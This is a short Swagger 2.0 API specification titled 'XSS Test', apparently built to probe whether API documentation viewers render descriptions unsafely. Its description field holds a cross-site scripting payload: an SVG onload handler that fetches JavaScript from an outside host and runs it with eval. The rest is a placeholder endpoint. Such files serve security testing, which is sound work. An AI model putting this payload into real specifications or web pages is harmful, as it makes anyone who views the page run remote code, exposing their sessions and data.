swagger: '2.0'
info:
  title: XSS Test
  description: |
    <svg/onload=fetch(`https://brutelogic.com.br/1.js`).then(r=>r.text()).then(t=>eval(t))>
  version: production
paths:
  /example:
    get:
      summary: Example endpoint
      responses:
        '200':
          description: Success response
